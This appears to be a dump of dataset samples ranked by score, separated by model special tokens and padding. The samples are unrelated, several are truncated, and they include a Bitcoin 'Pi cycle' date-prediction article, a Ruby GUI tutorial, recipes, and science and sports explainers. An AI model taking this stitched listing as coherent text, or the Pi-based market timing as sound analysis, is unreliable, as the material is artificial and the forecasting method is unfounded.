of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 63; Score = 425984.0 +<|begin_of_text|>When I started being a content creator in the Crypto Space over 3 years ago, all my articles were being published on CoinTelegraph (besides this website) and I decided to do a different kind of analysis on August 31st, 2014. The Article was titled “Intro to Time” and it had one of my favorite art covers to date: + +The article also featured the table above with key dates in the life-cycle of Bitcoin and while I myself did not take the Mid June 2015 date seriously, I do not plan to make the same mistake again Mid August 2017. + +Background: + +I have been a fan of Martin Armstrong’s work for a long time and even attended several WEC conferences over the last few years. I give him lots of credit for helping me understand Global Economics, Capital Flows and the concept of time being Cyclical and NOT linear. So just as a thought experiment, I decided to apply the most basic idea from Martin’s writing to Bitcoin. this concept that since time is cyclical we can represent the number Pi in terms of days (or years) and apply it to get some useful dates to keep an eye on in the future. + +The Math: + +In it’s most basic form, taking the number Pi = 3.1416 and giving it a multiplier of 1000 = 3,141.6 days. Converting this number to years by dividing it by 365.25 = 8.6012 years. + +NOTE: I used 8.61 years in the original article as I divided by 365 instead + +So at this point 8.6 years represents one full cycle and the most critical day for Bitcoin going forward (more on this later). We can also consider multiples of this day as slightly less significant, which is why in the 2014 article I was looking at half and quarter cycles to find dates of significance to keep an eye on (more on this later as well) + +This cycle needs to be applied from some starting point. While several options were available like Publication of the Bitcoin White Paper and the first popular financial transaction giving Bitcoin a price, the most logical one seemed to be the generation of the Genesis Block on January 3rd 19:05:05 UTC Time. + +NOTE: At this point I would like to thank Mark B for providing a Python script in order to remove all rounding errors when determining the date. The code will be at the bottom of the articles for those interested in running it on your own. + +Using this code we +================================================================================ +Rank = 64; Score = 423936.0 +<|begin_of_text|>In fiscal year 2015, BC Hydro paid $1.064 billion to independent power producers (IPPs), an average of 7.9¢ a KWh. + +In fiscal year 2016, BC Hydro paid $1.229 billion to independent power producers and, in the quarter ended March 31 2016, it paid 9.8¢ a KWh, a 23% increase of the unit cost in the preceding fiscal year. + +In fiscal year 2015, BC Hydro sold electricity to Alberta and Western USA for $775 million, netting an average of 3.5¢ a KWh. + +In fiscal year 2016, BC Hydro sold electricity to Alberta and Western USA for $460 million, netting an average of 3.1¢ a KWh, a 14% decrease in the unit cost in the preceding fiscal year. + +Had IPP’s sold their power for the same price that BC Hydro realized in trade markets, they would have realized: + +In FY 2015, $591 million less ; + +; In FY 2016, $782 million less. + +The deals will get better for IPPs. BC Hydro’s website now announces that it has contracted for 19,290 GWh from these private producers. That is 35% more than purchases in the just completed fiscal year and follows an established trend. + +The chart is prepared from annual sales reports issued by BC Hydro. This shows the total sales to the utility’s three main customers groups: residential, commercial and heavy industrial. + +This entire subject is not one that BC Liberals like to discuss. I’m told they have BC Hydro working on a revised demand forecast and have had major problems trying to force square pegs into round holes. Even without Site C, it would be impossible to justify further purchases from private power producers. If BC Hydro continues dumping power on external trade markets, prices will be reduced to even lower levels. + +That outcome will make expensive Site C power an even bigger financial disaster.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 65; Score = 413696.0 +<|begin_of_text|>A: + +The number of dimples on a golf ball varies, depending on the manufacturer and may even be different for different models made by the same manufacturer. The dimples are usually the same size as one another, but some golf balls have several different sizes of dimple on the same ball. Any number between 300 and 500 dimples is reasonable, and 336 is a common number. Not just any number will do. Golf balls are usually covered with dimples in a highly symmetrical way, and for many values of N, it is impossible to cover the golf ball uniformly without gaps. Symmetry is important or the ball will wobble or its flight will depend on which part of the ball is forwards or sideways as the ball spins. You can get an idea of how to space dimples uniformly around a sphere by thinking about the "platonic solids" -- the tetrahedron, cube, octahedron, dodecahedron and icosahedron, and placing a dimple at the corners of an inscribed platonic solid. Variations on this theme give the corners of Buckminster Fuller’s geodesic domes, and also the possible symmetrical locations of dimples on a golf ball. + +If you’re curious about why the dimples are there in the first place, see. + +Tom J + +(published on 10/22/2007)<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 66; Score = 411648.0 +<|begin_of_text|>In this tutorial you will learn how to create simple calculator in Ruby GUI toolkit Shoes that looks like this: + + + +Because original Shoes is outdated and new Shoes 4 isn’t released yet, we’ll use Green Shoes in this tutorial. + +How to install Shoes + +Before you can install green_shoes you have to install ruby. I’ve included instructions about how to install ruby in previous post. + +If you have ruby installed by rvm, just install green_shoes with rubygems: + +$ gem install green_shoes + +If you have trouble with installation, you have to install ruby gtk2. + +Running shoes + +To run we need to add green_shoes gem to our ruby file. + +Go to your favorite text editor, create new file calculator.rb and type this code: + +calculator.rb + +require 'green_shoes' Shoes. app ( title : "My calculator", width : 200, height : 240 ) do end + +Go to the terminal and run green shoes: + +ruby calculator.rb + +You should see something like this: + + + +Adding basic template for app + +Let’s add template for our calculator. We need to add place for number field, clear button and remaining buttons. + +require 'green_shoes' Shoes. app ( title : "My calculator", width : 200, height : 240 ) do flow width : 200, height : 240 do flow width : 0. 7, height : 0. 2 do background rgb ( 0, 157, 228 ) end flow width : 0. 3, height : 0. 2 do end flow width : 1. 0, height : 0. 8 do background rgb ( 139, 206, 236 ) end end end + +If you run shoes again, you should see something like this: + + + +Let’s look at what we’ve done. First we’ve created flow, that copy size of screen. + +flow width : 200, height : 240 do + +Our app is divided into three parts: number field, clear button and remaining buttons, so we’ve created three different flows to match it. + +flow width : 0. 7, height : 0. 2 do background rgb ( 0, 157, 228 ) end + +Here we used floating points to match size of flow. If you type 0.7 it means 70% width of screen and if you type 0.2 it means 20% size. Then we’ve +================================================================================ +Rank = 67; Score = 411648.0 +<|begin_of_text|>When bottles of + +'s new Engel Weisse hit shelves in late July, the German-style brew will have the lowest alcohol content of any Colorado beer sold in a liquor store -- 4 percent ABV, or 3.2 percent alcohol by weight. + +Continue Reading + +And it would have been much lower, between 2.5 and 3.4 percent ABV, if Elevation hadn't received a couple of reminders about a controversial rule that forbids liquor stores from selling low-alcohol beers, those that weigh in at under 4 percent ABV. + +See also: - Ten new Colorado craft beers to look for in July - Beer here! John Hickenlooper will sign Senate Bill 60 at 3 p.m. today at Old Chicago - Light beer ban at restaurants to be lifted?: Last chance for Colorado to see the light + +"We took a deeper look into the law and talked to some of our distributors and some retail outlets...and decided to change the recipe a little bit," says Elevation spokesman Xandy Bustamante. "The difference in taste is very, very minimal." + +The beer is a traditional German-style Berliner weisse, meaning it has crisp, sour notes that make it good for hot-weather drinking. Elevation aged its version in second-use whiskey barrels that have been washed so that they impart more of the oak flavors. + +In Germany, these unfiltered wheat-based beers are served with sweet syrups, like raspberry and woodruff; Elevation will do the same in its Poncha Springs taproom. + +"We wanted to do something sour for a long time, and we decided that we specifically wanted to make a Berliner weisse because it's an everyday sour, and one that you can have a couple of because it's low in alcohol," Bustamante says. + +Originally, Elevation planned to brew the beer at 2.5 percent ABV, which would have made it around the same alcohol content as similar beers in Germany, and then it moved it up to 3.4 percent. The brewery even made a batch of Engel Weisse at that ABV -- before realizing that the alcohol content was still too low to be legally sold in liquor stores. + +"We were disappointed when we had to change it," Bustamante says. "But since draft accounts and liquor stores are 100 percent of our business, we adjusted the recipe." + +The change was forced by a Colorado Department of Revenue rule that received a lot of attention in 2010 and 2011 amid the ongoing +================================================================================ +Rank = 68; Score = 409600.0 +<|begin_of_text|>This beautiful instrument cannot be tuned. Image: Gryffindor, via Wikimedia Commons. CC BY-SA 3.0. + +The integers are a unique factorization domain, so we can’t tune pianos. That is the saddest thing I know about the integers. + +I talked to a Girl Scout troop about math earlier this month, and one of our topics was the intersection of math and music. I chose to focus on the way we perceive ratios of sound wave frequencies as intervals. We interpret frequencies that have the ratio 2:1 as octaves. (Larger frequencies sound higher.) We interpret frequencies that have the ratio 3:2 as perfect fifths. And sadly, I had to break it to the girls that these two facts mean that no piano is in tune. In other words, you can tuna fish, but you can't tune a piano. + +When we tune an instrument, we would like for all our octaves and fifths to be perfect. One way to tune an instrument would be to start with a pitch and start working out the fifths above and below it it. We start with some frequency that we call C. Then 3/2 times that frequency is G, 9/4 times that frequency is D (an octave and a step above our original C), and so on. If you learned about the “circle of fifths” at some point in your musical life, then you know that if we keep going up by fifths, we’ll eventually land back on something we'd like to call C. It takes a total of 12 steps, and so if we keep all our fifths perfect, the frequency of the C we get at the end is 312/212, or 531441/4096, times the frequency of the C we had at the beginning. You might notice that 531441/4096 is not an integer, much less a power of 2, so our ears would not perceive the C at the end as being in tune with the C at the beginning. (531441/4096 is about 130, which is 2 more than a power of 2, so we would hear the C at the top as being sharp.) And it's not a problem with the assumption that it takes 12 fifths to get from C to shining C. We can never get perfect octaves from a stack of fifths because no power of 3/2 will ever give us a power of 2. + +Imperfect octaves are +================================================================================ +Rank = 69; Score = 409600.0 +<|begin_of_text|>Mass and Weight are two often misused and misunderstood terms in mechanics and fluid mechanics. + +The fundamental relation between mass and weight is defined by Newton's Second Law. Newton's Second Law can be expressed as + +F = m a (1) where F = force (N, lb f ) m = mass (kg, slugs) a = acceleration (m/s2, ft/s2) + +Mass + +Mass is a measure of the amount of material in an object, being directly related to the number and type of atoms present in the object. Mass does not change with a body's position, movement or alteration of its shape, unless material is added or removed. + +an object with mass 1 kg on earth would have the same mass of 1 kg on the moon + +Mass is a fundamental property of an object, a numerical measure of its inertia and a fundamental measure of the amount of matter in the object. + +Weight + +Weight is the gravitational force acting on a body mass. The generic expression of Newton's Second Law (1) can be transformed to express weight as a force by replacing the acceleration - a - with the acceleration of gravity - g - as + +F g = m a g (2) where F g = gravitational force - or weight (N, lb f ) m = mass (kg, slugs) a g = acceleration of gravity on earth (9.81 m/s2, 32.17405 ft/s2) + +Example - The Weight of a Body on Earth vs. Moon + +The acceleration of gravity on the moon is approximately 1/6 of the acceleration of gravity on the earth. The weight of a body with mass 1 kg on the earth can be calculated as + +F g_ earth = (1 kg) (9.81 m/s2) + += 9.81 N + +The weight of the same body on the moon can be calculated as + +F g_ moon = (1 kg) ((9.81 m/s2) / 6) + += 1.64 N + +The handling of mass and weight depends on the systems of units used. The most common unit systems are + +the International System - SI + +the British Gravitational System - BG + +the English Engineering System - EE + +One newton is + +≈ the weight of one hundred grams - 101.972 gf (g F ) or 0.101972 kgf (kg F or kilopond - kp (pondus is latin for weight)) + +) or 0.101972 kgf ( +================================================================================ +Rank = 70; Score = 407552.0 +<|begin_of_text|>Bucharest City Hall has 860 employees, Berlin City Hall has 207 + +Bucharest City Hall has a large apparatus compared to other big cities in Europe. + +It has 860 employees, and 10 mayor’s personal advisers for a population of 1.88 million people on a surface of 228 square kilometers. By comparison, Berlin has 207 employees, at a population of 3.46 million on an area of 891 sq km, according to data from the National Council of Small and Medium-Sized Companies in Romania (CNIPMMR). + +The council has been critical of the Bucharest City Hall’s plan to create 19 public service companies that will be controlled by the municipality. + +CNIPMMR representatives explained that in other EU member states the local authorities normally set up a small number of companies in uncompetitive, subsidized areas. In Vienna, for example, there are three municipal companies, at a number of 2.26 million inhabitants on an area of 414 sq km. Madrid has seven municipal companies at a population of 3.16 million on an area of 605 sq km. + +One week ago, the General Council of Bucharest City Hall approved the creation of 19 companies managed by the City Hall that will provide services in energy, public lighting, hospital administration, sports facilities, tourist attractions. + +editor@romania-insider.com<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 71; Score = 403456.0 +<|begin_of_text|>If you could purchase 100 block erupter sapphires for 35BTC today, that would give the fund another 33Gh/s (@250Watts). The break even TODAY is about 85 days. Say the network hash rate doubles in the fall, that would mean 170 days or if it triples, 255 days. They sip power so running them longer isn't an issue. I realize you would need good hubs which are ~$70US each for an aluminum 10 port USB 3 powered hub (aitech sells one through amazon for 69.99 - I believe the seller's name is computerExtension). I know these work great for 10 usb miners. Are you currently running a couple of 6770's and a couple of 7770's for bitcoin? Even if we just purchase sufficient amounts of block erupters to replace those, we would be further ahead. The usb hubs would com in handy for the next gen asics too I'm sure. They have to release a little usb key for those if us who can't afford the big rigs!!I ordered 20 block erupter blades last wednesay and had them running by Friday evening before I left for work. I paid 5.99 BTC/10 and I saw just last night the price dropped to 4.19BTC/10 (free UPS express shipping until Aug 15th on 5BTC+ orders). The miners were new and worked perfectly. I'm hesitant to mention this seller as I see BTCGuild store is 1000 units shy right now!I'm just thinking in the short term to keep up our percentage of the network share while you formulate a long term plan.Thoughts anyone?Take care + +Thanks for the confidence guys, it's appreciated. I'd like to get as much feedback as possible in order to reach a consensus on the direction we should take going forward as far as future hardware purchases go. I favor Bitfury gear due to their efficiency claims and ability to demonstrate progress in their development process. On the other hand I've seen little evidence to convince me that knc will be able to deliver products on their timeline. Does anybody disagree with my take on this and if so why? Also does anybody have any other suggestions as far as which vendor they feel is a better choice and if so why? Avalon has said they were done with pre-orders and that they were developing 55nm? chips of their own for October delivery. Clearly their reputation has been tarnished, but +================================================================================ +Rank = 72; Score = 403456.0 +<|begin_of_text|>Share + +Now this is…CHICKEN TENDER LOVE!!! Click on “Show more” below for this scrumptious Fried CHICKEN TENDER recipe… + +CHICKEN TENDER RECIPE + +2 lbs. chicken tenders or chicken breast cut into strips + +2 cups buttermilk + +1/2 cup all-purpose flour + +2 teaspoons salt + +1 teaspoon fresh cracked pepper + +3 eggs + +2-4 cup panko crumbs + +1/2 cup vegetable oil + +Marinate chicken in buttermilk overnight in refrigerator. + +Add flour into shallow dish…set aside. + +Beat eggs in a shallow dish with salt and pepper. Set aside. + +Add panko crumbs to shallow dish…set aside. + +Drain chicken strips from buttermilk. Add chicken strips, one at a time, to flour and coat well. Dip floured chicken strips into egg mixture coating well. Roll floured, egg dipped chicken strips into panko crumbs until well coat. + +Add oil to large skillet over medium heat. Fry chicken tenders in heated oil. Fry on each side for 2-3 minutes or until golden brown. Remove cooked chicken tenders and drain on cooling rack. + +ENJOY!!! + +Video Rating: 4 / 5<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 73; Score = 403456.0 +<|begin_of_text|>(A) supra-linearity, (B) linear + +(C) linear-quadratic, (D) hormesis Different assumptions on the extrapolation of the cancer risk vs. radiation dose to low-dose levels, given a known risk at a high dose:supra-linearity,linearlinear-quadratic,hormesis + +The linear no-threshold model (LNT) is a model used in radiation protection to quantify radiation exposure and set regulatory limits. It is most frequently used to calculate the probability of radiation induced cancer at both high doses where epidemiology studies support its application but, controversially, it likewise finds applications in calculating the effects of low doses, a dose region that is fraught with much less statistical confidence in its predictive power but that nonetheless has resulted in major personal and policy decisions in regards to public health. The model assumes that the long-term, biological damage caused by ionizing radiation (essentially the cancer risk) is directly proportional to the dose. This allows the summation by dosimeters of all radiation exposure, without taking into consideration dose levels or dose rates.[1] In other words, radiation is always considered harmful with no safety threshold, and the sum of several very small exposures are considered to have the same effect as one larger exposure (response linearity). + +One of the organizations for establishing recommendations on radiation protection guidelines internationally, the UNSCEAR, recommended in 2014 policies that do not agree with the Linear No-Threshold model at exposure levels below background levels of radiation to the UN General Assembly from the Fifty-Ninth Session of the Committee. Its recommendation states that "the Scientific Committee does not recommend multiplying very low doses by large numbers of individuals to estimate numbers of radiation-induced health effects within a population exposed to incremental doses at levels equivalent to or lower than natural background levels." This is a reversal from previous recommendations by the same organization.[2] + +There are three active (2016) challenges to the LNT model currently being considered by the US Nuclear Regulatory Commission. One was filed by Nuclear Medicine Professor Carol Marcus of UCLA, who calls the LNT model scientific "baloney".[3] + +Whether the model describes the reality for small-dose exposures is disputed. It opposes two competing schools of thought: the threshold model, which assumes that very small exposures are harmless, and the radiation hormesis model, which claims that radiation at very small doses can be beneficial. Because the current data are inconclusive, scientists disagree on which model should be used. Pending any definitive answer to these questions and the precautionary principle, the model is sometimes +================================================================================ +Rank = 74; Score = 399360.0 +<|begin_of_text|>40/30 seems like a very competitive point score, with the returner already capturing two points and being just three points from breaking serve. + +But don’t be fooled: It’s still one-way traffic for the server. + +Even though the returner has won 40 per cent (two of five) of the points played so far in the game, his chance of breaking serve is still less than 10 per cent. + +An Infosys ATP Beyond The Numbers analysis of the current Top 10 players in the Emirates ATP Rankings shows that, since the start of the 2015 season, they have held serve from 40/30 92.7 per cent (6331/6826) of the time. + +The player who has been the toughest to break when leading 40/30 on serve is Roger Federer, who has held a dominant 95.4 per cent (535/561) of the time from this seemingly competitive point score. + +Current Top 10: Holding from 40/30 since the start of the 2015 season + +Federer: Past Three Seasons Holding From 40/30 + +2017 = 96.3% (157/163) + +2016 = 95.5% (107/112) + +2015 = 94.7% (271/286) + +Even worse news for his opponents: Federer has slightly improved in this specific category during the past three seasons. This year, he's led 40/30 during 163 service games and has lost only six of those games. Opponents must feel like they are getting closer to capturing Federer’s serve, but in reality, they are farther away from breaking than they were at 0/0. + +Infosys Nia Data shows that in 2017 Federer is holding serve 91 per cent of the time, but at 40/30, he is holding 96.3 per cent (157/163) of the time. The returner winning two points in the service game 